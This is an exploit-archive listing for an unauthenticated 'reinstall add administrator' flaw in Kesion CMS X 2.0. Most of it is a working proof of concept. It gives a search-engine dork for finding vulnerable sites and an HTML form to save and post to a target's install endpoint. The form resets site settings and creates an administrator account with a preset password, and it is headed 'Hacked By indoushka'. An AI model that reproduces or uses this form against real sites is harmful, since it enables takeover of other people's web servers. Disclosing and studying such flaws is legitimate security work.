what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kesion CMS X 2.0 Add Administrator

Kesion CMS X 2.0 Add Administrator
Posted Jun 9, 2023
Authored by indoushka

Kesion CMS X version 2.0 suffers from an unauthenticated add administrator vulnerability.

tags | exploit, add administrator
SHA-256 | de0b37cd4485d86b801c27d7ced154e311d1fc425567511f3834306f7bec9321
Download | Favorite | View

Kesion CMS X 2.0 Add Administrator

Change Mirror Download
====================================================================================================================================
| # Title     : KesionCMS X2.0 Reinstall Add Admin Vulnerability                                                                   |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             | 
| # Vendor    : https://www.kesion.com/                                                                                            |  
| # Dork      : Powered by KesionCMS                                                                                               |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /install/index.asp

[+] http://127.0.0.1.com/install/?action=s4 = add your information to login

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] Exploit :

[+] @t Line 09 & 16 change the domain name of target

    <head><title>
            Hacked By indoushka
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>
        </head>
        <body>  
 <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">
        <div class="guide">
         <div class="guidetitle">
                </div>
                <div class="clear"></div>
              </div>
          <div class="clear"></div>
 <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5"  />
       <input type="hidden" name="DBlx" value=""  />
       <input type="hidden" name="CkbData" value=""  />
       
       <input type="hidden" name="TxtDBName_a" value=""  />
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />
      
<div id="http://www.tzxdcpv.com/install/?action=s4">
  
    

     </div>
     <div class="clear"></div>
     <div class="sjlist">
      <h5>网站参数配置</h5>
      <ul>
        <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li>
        <li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 
        如http://www.kesion.com。
        </li>
        <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 
        系统会自动获取,建议不要修改。
        </li>
        <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">
        免费版本用户请留空或填“0”。
        </li>
        <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li>
                <li><span> 后台登录验证码:</span>
                 <input type="radio" name="isCode_a" value="True"  /> 启用  
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用
                </li>
               
        <li><span>管理认证码:</span>
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用 
                <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>
      </ul>
      <div class="clear"></div>
      <h5>填写管理员信息</h5>
      <ul>
        <li><span>管理员账号:</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>
        <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>
        <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>
      </ul>
      <div class="clear blank10"></div>
      
      <div style="padding:5px">
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">
      </div>
    </div>

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close